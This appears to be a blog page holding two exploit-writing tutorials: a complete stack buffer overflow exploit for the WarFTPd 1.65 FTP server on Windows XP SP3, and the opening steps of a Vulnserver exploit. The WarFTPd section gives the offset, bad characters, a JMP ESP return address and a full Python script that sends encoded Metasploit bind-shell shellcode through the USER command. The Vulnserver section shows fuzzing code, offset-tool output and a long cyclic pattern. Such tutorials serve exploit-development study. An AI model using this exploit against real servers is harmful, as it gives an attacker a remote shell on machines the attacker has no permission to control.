Pages

Thursday 10 May 2018

Exploiting Warftpd 1.65

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Warftpd 1.65 and exploit writing PoC

I had some free time. So I set back to exercise on Warftpd. This is a short tutorial on how to write an exploit for Warftpd 1.65 for XP SP3. I used OllyDbg for this tutorial.

1. We have to determine where the overflow happens for the purpose we use a pattern of non-repeatable characters.

import socket

pattern = ""

try:
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect (("192.168.1.27", 21))
s.send ("USER " + pattern + " \r\n")
s.send('PASS '+'\r\n')
s.recv (1024)
s.close ()
except:

print "Socket closed"

2. To get the exact location for the offset we search for the characters that we last written.


I checked manually what was written in the EIP register to determine the exact location of the offset and it was:
0x31 0x41 0x71 0x32 -> 1 A q 2 
Which sets our offset at 485




For reference this was the pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G

3. After we determine the offset we have to determine the bad characters in our case the \x00\x20\x0a\x0d\x40. I will not go much into detail at this part - you can read the vulnserver article. In general the idea is to get rid of all chars that can break the exploitation. 

x00 - null 
x0a - \n
x0d - \r
x40 - @
x20 - space

4. We will need to jump to an ESP register where we can inject our exploitation code.

For XP SP3 I used findjmp to find a ESP that is directly to KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin

Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp

#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp <- will use this one
#0x7C868667      call esp 
#Finished Scanning KERNEL32 for code useable with the esp register


I tried writing 0x7C868667 into the EIP however I got wrong data at the end (see the screenshot), so I directly changed to  0x7C86467B which worked flawlessly.

5. The payload:

For Windows XP SP3 I used a bind shell:
/usr/share/framework2

#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00\x20\x0a\x0d\x40"

Exploit for Warftpd 1.65 on  Windows XP:



import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.27'
SER_PORT = 21

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)
message = '\x41' * 485 + '\x7B\x46\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x67\xe3\xf8"
"\x6f\x83\xeb\xfc\xe2\xf4\x9b\x89\x13\x22\x8f\x1a\x07\x90\x98\x83"
"\x73\x03\x43\xc7\x73\x2a\x5b\x68\x84\x6a\x1f\xe2\x17\xe4\x28\xfb"
"\x73\x30\x47\xe2\x13\x26\xec\xd7\x73\x6e\x89\xd2\x38\xf6\xcb\x67"
"\x38\x1b\x60\x22\x32\x62\x66\x21\x13\x9b\x5c\xb7\xdc\x47\x12\x06"
"\x73\x30\x43\xe2\x13\x09\xec\xef\xb3\xe4\x38\xff\xf9\x84\x64\xcf"
"\x73\xe6\x0b\xc7\xe4\x0e\xa4\xd2\x23\x0b\xec\xa0\xc8\xe4\x27\xef"
"\x73\x1f\x7b\x4e\x73\x2f\x6f\xbd\x90\xe1\x29\xed\x14\x3f\x98\x35"
"\x9e\x3c\x01\x8b\xcb\x5d\x0f\x94\x8b\x5d\x38\xb7\x07\xbf\x0f\x28"
"\x15\x93\x5c\xb3\x07\xb9\x38\x6a\x1d\x09\xe6\x0e\xf0\x6d\x32\x89"
"\xfa\x90\xb7\x8b\x21\x66\x92\x4e\xaf\x90\xb1\xb0\xab\x3c\x34\xb0"
"\xbb\x3c\x24\xb0\x07\xbf\x01\x8b\xfd\x4e\x01\xb0\x71\x8e\xf2\x8b"
"\x5c\x75\x17\x24\xaf\x90\xb1\x89\xe8\x3e\x32\x1c\x28\x07\xc3\x4e"
"\xd6\x86\x30\x1c\x2e\x3c\x32\x1c\x28\x07\x82\xaa\x7e\x26\x30\x1c"
"\x2e\x3f\x33\xb7\xad\x90\xb7\x70\x90\x88\x1e\x25\x81\x38\x98\x35"
"\xad\x90\xb7\x85\x92\x0b\x01\x8b\x9b\x02\xee\x06\x92\x3f\x3e\xca"
"\x34\xe6\x80\x89\xbc\xe6\x85\xd2\x38\x9c\xcd\x1d\xba\x42\x99\xa1"
"\xd4\xfc\xea\x99\xc0\xc4\xcc\x48\x90\x1d\x99\x50\xee\x90\x12\xa7"
"\x07\xb9\x3c\xb4\xaa\x3e\x36\xb2\x92\x6e\x36\xb2\xad\x3e\x98\x33"
"\x90\xc2\xbe\xe6\x36\x3c\x98\x35\x92\x90\x98\xd4\x07\xbf\xec\xb4"
"\x04\xec\xa3\x87\x07\xb9\x35\x1c\x28\x07\x97\x69\xfc\x30\x34\x1c"
"\x2e\x90\xb7\xe3\xf8\x6f")


my_sock.send ("USER " + message + " \r\n")
my_sock.send('PASS '+'\r\n')
print my_sock.recv(1024)
my_sock.close()


Tuesday 1 May 2018

Exploiting Vulnserver

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Vulnserver and exploit writing PoC

I had some free time. So I set back to exercise on Vulnserver. This is a short tutorial on how to write an exploit for Vulnserver for both XP SP3 and Windows 7.   

The process is pretty straight forward:
1. We have to determine where the overflow happens for the purpose we use a pattern of non-repeatable characters.

#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050

import socket
# Place the pattern here
pattern = ""

try:
# while True:
# open a connection to vulnserver
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect (("192.168.1.26", 9999))

# receive the banner for vulnserver
s.recv (1024)

s.send ("TRUN  /.:/" + pattern + " \r\n")

# receive the response from vulnserver
s.recv (1024)

# close the connection
s.close ()
except:
# if we get to here then something happened to vulnserver because the connection is closed
print "Socket closed "
#

#

2. To get the exact location for the offset we search for the characters that we last saw in the stack.






#/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 8co9

#[*] No exact matches, looking for likely candidates...
#[+] Possible match at offset 446 (adjusted [ little-endian: 8704 | big-endian: 19788799 ] ) byte offset 1
#[+] Possible match at offset 1226 (adjusted [ little-endian: 8448 | big-endian: 19723263 ] ) byte offset 1
#[+] Possible match at offset 2006 (adjusted [ little-endian: 8192 | big-endian: 19657727 ] ) byte offset 1
#[+] Possible match at offset 2786 (adjusted [ little-endian: 7936 | big-endian: 19592191 ] ) byte offset 1
#[+] Possible match at offset 3566 (adjusted [ little-endian: 7680 | big-endian: 19526655 ] ) byte offset 1
#[+] Possible match at offset 4346 (adjusted [ little-endian: 7424 | big-endian: 19461119 ] ) byte offset 1
#[+] Possible match at offset 5126 (adjusted [ little-endian: 7168 | big-endian: 19395583 ] ) byte offset 1
#[+] Possible match at offset 5906 (adjusted [ little-endian: 6912 | big-endian: 19330047 ] ) byte offset 1
#[+] Possible match at offset 6686 (adjusted [ little-endian: 6656 | big-endian: 19264511 ] ) byte offset 1

#[+] Possible match at offset 7466 (adjusted [ little-endian: 6400 | big-endian: 19198975 ] ) byte offset 1

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6F43376F

[*] Exact match at offset 2002

I checked manually the  offset and the exact location was 2006

For reference this was the pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5